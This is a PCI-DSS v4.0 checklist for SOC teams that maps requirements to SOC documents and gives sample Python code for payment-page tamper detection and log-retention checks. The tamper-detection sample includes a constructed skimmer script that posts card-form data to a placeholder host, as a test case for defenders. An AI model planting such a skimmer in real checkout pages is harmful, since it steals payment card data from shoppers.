# PCI-DSS v4.0 — SOC Requirements Checklist
Map SOC operational requirements to PCI-DSS v4.0 controls.
Use this document for audit preparation and gap identification.
## 1. Overview
PCI-DSS v4.0 (published March 2022; the only active version since v3.2.1 was retired on 31 March 2024, with its future-dated requirements mandatory from 31 March 2025) defines security requirements for organizations that store, process or transmit payment card data. Note that v4.0 itself has since been superseded by the v4.0.1 limited revision (June 2024; v4.0 retired 31 December 2024): requirement numbering is unchanged, so the mappings below apply to both. SOC teams play a critical role in meeting the monitoring, detection, and response requirements.
### SOC-Relevant Requirements
```mermaid
pie title PCI-DSS Requirements Covered by SOC
    "SOC Directly Responsible" : 3
    "SOC Contributes" : 5
    "Not SOC Scope" : 4
```
SOC operations directly address Requirements 10, 11 and 12.10 (three), contribute to Requirements 1, 2, 5, 6 and 7 (five), and treat the remaining Requirements 3, 4, 8 and 9 (four) as outside direct SOC scope.
## 2. Requirement 10 — Log and Monitor All Access
SOC Role: Primary owner of log management and monitoring.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 10.1 | Processes and mechanisms for logging and monitoring | ✅ | Log Source Matrix |
| 10.2 | Audit logs capture required events | ✅ | Log Source Onboarding |
| 10.3 | Audit logs are protected from destruction | 🟡 | Log Clearing PB |
| 10.4 | Audit logs are reviewed for anomalies | ✅ | Alert Tuning, Detection Rules |
| 10.5 | Audit log history is retained | 🟡 | Data Handling Protocol |
| 10.6 | Time-synchronization technology | 🟡 | Log Source Matrix |
| 10.7 | Failures of critical security controls detected & reported | ✅ | SOC Checklists, Shift Handoff |
## 3. Requirement 11 — Test Security Regularly
SOC Role: Detection validation and vulnerability scanning.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 11.1 | Processes for regular security testing | ✅ | Simulation Guide |
| 11.2 | Wireless access points managed | ⬜ | Not SOC scope (network team) |
| 11.3 | Vulnerabilities identified and addressed | ✅ | Vulnerability Management |
| 11.4 | External/internal penetration testing | 🟡 | Purple Team Exercise |
| 11.5 | Network intrusions and unexpected file changes detected and responded to (11.5.1 IDS/IPS; 11.5.2 change-detection on critical files) | ✅ | Network Security Monitoring, IDS/IPS Sigma Rules |
| 11.6 | Unauthorized changes to payment pages detected | 🟡 | Web Attack PB |
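Requirement 11.6.1 does not prescribe a mechanism for detecting unauthorized changes to payment pages, only that one exists and is evaluated regularly. The following is an added example (not part of the original checklist or any project it references) of one such mechanism: it fingerprints every `<script>` a payment page carries, external scripts by `src` URL plus SRI `integrity` value and inline scripts by SHA-256 of their body, compares the result against an approved baseline, and reports anything added, removed or modified. The page contents, hostnames (reserved `.test` TLD) and the placeholder integrity value are constructed sample data.

```python
"""Payment-page script inventory and change detection (PCI-DSS 11.6.1).

Added example, not part of the original checklist. Fingerprints every <script>
on a payment page (external by src URL + SRI integrity value, inline by SHA-256
of the body), compares against an approved baseline and reports additions,
removals and modifications. Page contents and hostnames are constructed samples.
"""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Builds {identifier: fingerprint} for every <script> element seen."""

    def __init__(self):
        super().__init__()
        self.entries = {}
        self._inline_parts = None   # list while inside an inline <script>, else None
        self._inline_count = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attr = dict(attrs)
        if attr.get("src"):
            # External script: keyed by URL; fingerprint is its SRI value, so
            # stripping or altering `integrity` also surfaces as a change.
            self.entries[attr["src"]] = attr.get("integrity") or "no-sri"
        else:
            self._inline_parts = []

    def handle_data(self, data):
        if self._inline_parts is not None:
            self._inline_parts.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline_parts is not None:
            self._inline_count += 1
            body = "".join(self._inline_parts).strip().encode("utf-8")
            digest = hashlib.sha256(body).hexdigest()
            self.entries[f"inline#{self._inline_count}"] = "sha256-" + digest
            self._inline_parts = None


def script_inventory(html):
    """Return the {identifier: fingerprint} inventory of a rendered page."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    return collector.entries


def diff_inventory(baseline, current):
    """Scripts added, removed, or whose fingerprint differs from the approved baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": sorted(k for k in common if baseline[k] != current[k]),
    }


def check_payment_page(baseline, html):
    """(True, empty findings) if the page matches the baseline, else (False, findings)."""
    findings = diff_inventory(baseline, script_inventory(html))
    return not any(findings.values()), findings


# Constructed sample: the approved checkout page as captured when the baseline
# was authorised (the integrity value is a placeholder, not a real digest).
APPROVED_PAGE = """<html><head>
<script>window.checkoutConfig = {"merchant": "m_1001", "currency": "USD"};</script>
<script src="https://js.payments-psp.test/v3/checkout.js"
        integrity="sha384-APPROVED_DIGEST_PLACEHOLDER" crossorigin="anonymous"></script>
</head><body><form id="card-form"></form></body></html>"""

# Constructed sample: the same page after a skimmer-style tamper. The inline
# config now exfiltrates the form on submit, and a third script with no SRI was injected.
TAMPERED_PAGE = """<html><head>
<script>window.checkoutConfig = {"merchant": "m_1001", "currency": "USD"};
document.addEventListener("submit", e => fetch("https://stats.cdn-metrics.test/c",
    {method: "POST", body: new FormData(e.target)}));</script>
<script src="https://js.payments-psp.test/v3/checkout.js"
        integrity="sha384-APPROVED_DIGEST_PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://stats.cdn-metrics.test/t.js"></script>
</head><body><form id="card-form"></form></body></html>"""

APPROVED_BASELINE = script_inventory(APPROVED_PAGE)

if __name__ == "__main__":
    ok, findings = check_payment_page(APPROVED_BASELINE, TAMPERED_PAGE)
    print("match" if ok else "ALERT: payment page changed", findings)
```

In practice the page is fetched from the customer-facing edge (not from the origin, which a CDN- or third-party-side compromise would not touch) at the 11.6.1 frequency, and the baseline is the authorised script inventory that 6.4.3 already requires; a `changed` or `added` finding here is exactly the alert 12.10.5 expects the IR plan to cover.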
## 4. Requirement 12.10 — Incident Response
SOC Role: Primary owner of incident response.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 12.10.1 | Incident response plan exists | ✅ | IR Framework |
| 12.10.2 | Plan is reviewed and tested annually | ✅ | Purple Team Exercise, Phishing Simulation |
| 12.10.3 | Specific personnel available 24/7 | ✅ | SOC Team Structure, Shift Handoff |
| 12.10.4 | Personnel are properly trained | ✅ | Training Checklist, Analyst Onboarding |
| 12.10.4.1 | Frequency of IR training defined | ✅ | Training Checklist |
| 12.10.5 | Alerts from security monitoring trigger response | ✅ | Escalation Matrix, 50 Playbooks |
| 12.10.6 | IR plan is modified based on lessons learned | ✅ | Lessons Learned Template |
| 12.10.7 | IR procedures initiated on detection of stored PAN anywhere it is not expected | 🟡 | Severity Matrix; P1 playbooks (confirm a PAN-discovery procedure exists) |
## 5. SOC Contributions to Other Requirements
| Req | Title | SOC Contribution | Document |
|---|---|---|---|
| 1 | Network Security Controls | Monitor firewall & IDS alerts | Network Security Monitoring |
| 2 | Secure Configurations | Detect misconfigurations via monitoring | Cloud Security Monitoring |
| 5 | Anti-Malware | Monitor endpoint protection alerts | Malware PB, Ransomware PB |
| 6 | Secure Systems & Software | Monitor for exploitation attempts | Exploit PB, Zero-Day PB |
| 7 | Restrict Access | Monitor access control violations | Access Control, Privilege Escalation PB |
## 6. Audit Preparation Checklist
Use this checklist before a PCI-DSS audit:
- Log retention — Verify 12 months of audit log history is available for every CDE log source, with the most recent 3 months immediately available for analysis (10.5.1)
- Monitoring coverage — Confirm all CDE (Cardholder Data Environment) systems in Log Source Matrix
- Alert response — Document SLA compliance for P1/P2 alerts
- IR testing — Provide evidence of annual Purple Team exercise or tabletop
- Training records — Show analyst training completion dates
- Change detection — Demonstrate the change- and tamper-detection mechanism on payment pages (11.6.1), the authorised script inventory behind it (6.4.3), and its evaluation frequency (at least every seven days, or as set by targeted risk analysis)
- Vulnerability scans — Show four quarters of internal scans (11.3.1) and external scans by a PCI SSC Approved Scanning Vendor (11.3.2), with rescans proving high-risk and critical findings were resolved
- Incident log — Provide ticketing system export with resolution times
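The log retention and monitoring-coverage items above are the ones most often checked by hand the week before an assessment. The following is an added example (not part of the original checklist) of turning that check into a script: it takes a per-day inventory of which log-source days exist and in which storage tier, the shape a SIEM index or archive API might return, and reports for every CDE source in the Log Source Matrix the days missing from the 12-month window and the days inside the 3-month window that are not immediately searchable. Source names, tier names, the assessment date and the rule that "hot" and "warm" tiers count as immediately available are assumptions; the inventory is constructed sample data.

```python
"""Audit-prep check for PCI-DSS 10.5.1 log retention.

Added example, not part of the original checklist. Given a per-day inventory of
log-source coverage and storage tier (constructed here), reports for each CDE
log source the days missing from the 12-month window and the days inside the
3-month window that are not immediately searchable. Source names, tier names
and the IMMEDIATE_TIERS rule are assumptions.
"""
from collections import defaultdict
from datetime import date, timedelta

RETAIN_DAYS = 365                  # 10.5.1: retain audit log history for at least 12 months
HOT_DAYS = 90                      # 10.5.1: most recent three months immediately available
IMMEDIATE_TIERS = {"hot", "warm"}  # assumption: tiers searchable without a restore job


def retention_findings(inventory, expected_sources, as_of,
                       retain_days=RETAIN_DAYS, hot_days=HOT_DAYS):
    """Return {source: {"missing": [date, ...], "not_immediate": [date, ...]}}.

    inventory: iterable of (source, date, tier) rows, one per stored day.
    expected_sources: every CDE source in the Log Source Matrix; a source with
    no rows at all is reported with the whole retention window missing.
    """
    tier_by_day = defaultdict(dict)
    for source, day, tier in inventory:
        tier_by_day[source][day] = tier

    findings = {}
    for source in sorted(set(expected_sources) | set(tier_by_day)):
        missing, not_immediate = [], []
        for offset in range(retain_days):          # offset 0 is as_of itself
            day = as_of - timedelta(days=offset)
            tier = tier_by_day[source].get(day)
            if tier is None:
                missing.append(day)
            elif offset < hot_days and tier not in IMMEDIATE_TIERS:
                not_immediate.append(day)
        findings[source] = {"missing": sorted(missing),
                            "not_immediate": sorted(not_immediate)}
    return findings


def noncompliant_sources(findings):
    """Sources with any gap in either the 12-month or the 3-month window."""
    return sorted(s for s, f in findings.items() if f["missing"] or f["not_immediate"])


def build_sample_inventory(as_of):
    """Constructed sample data:
    - cde-fw-edge: 400 days present, hot for 90 days then cold (compliant)
    - cde-pos-app: archive job failed 200 and 201 days ago (two missing days),
      and its tiering policy moves data to cold after 60 days instead of 90
    - cde-db-primary: listed in the Log Source Matrix but never onboarded (no rows)
    """
    rows = []
    for offset in range(400):
        day = as_of - timedelta(days=offset)
        rows.append(("cde-fw-edge", day, "hot" if offset < 90 else "cold"))
        if offset not in (200, 201):
            rows.append(("cde-pos-app", day, "hot" if offset < 60 else "cold"))
    return rows


EXPECTED_SOURCES = ["cde-fw-edge", "cde-pos-app", "cde-db-primary"]
AS_OF = date(2025, 3, 31)   # constructed assessment date
SAMPLE_FINDINGS = retention_findings(build_sample_inventory(AS_OF), EXPECTED_SOURCES, AS_OF)

if __name__ == "__main__":
    for source, f in SAMPLE_FINDINGS.items():
        print(f"{source}: {len(f['missing'])} day(s) missing, "
              f"{len(f['not_immediate'])} day(s) in last {HOT_DAYS} not immediately available")
    print("non-compliant:", noncompliant_sources(SAMPLE_FINDINGS))
```

Run against the real index metadata, the output doubles as the evidence artifact for the retention and coverage items above: a source that appears in the Log Source Matrix but has no indexed days is a monitoring-coverage gap as well as a retention one.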
## 7. Key Differences: PCI-DSS v3.2.1 → v4.0
| Area | v3.2.1 | v4.0 (New) | SOC Impact |
|---|---|---|---|
| Log review | Daily review of security events and critical-system logs (10.6.1); tools allowed but not required | Automated mechanisms required for log reviews (10.4.1.1); review frequency for other logs set by targeted risk analysis (10.4.2.1) | Move daily review into SIEM correlation and alerting; document the risk analysis for non-critical log sources |
| Detection | IDS/IPS at the CDE perimeter and critical points (11.4) | IDS/IPS retained (11.5.1); service providers must also detect covert malware communication channels (11.5.1.1); payment-page tamper detection added (11.6.1) | Add C2/beaconing and DNS anomaly detections; onboard payment-page change alerts |
| IR testing | Annual plan test (12.10.2) | Annual test retained; plan must cover alerts from payment-page change detection (12.10.5) and discovery of stored PAN where not expected (12.10.7); training frequency set by targeted risk analysis (12.10.4.1) | Add payment-page tamper and PAN-discovery scenarios to exercises |
| Authentication | MFA for non-console administrative access and for remote access into the CDE (8.3) | MFA for all access into the CDE (8.4.2), with MFA systems resistant to replay and not bypassable (8.5.1) | Monitor for MFA bypass attempts and MFA configuration changes |
| Customized approach | N/A (compensating controls only) | A requirement's objective may be met with customized controls, each backed by a targeted risk analysis and controls matrix | Document the risk analysis and controls matrix for every customized SOC control |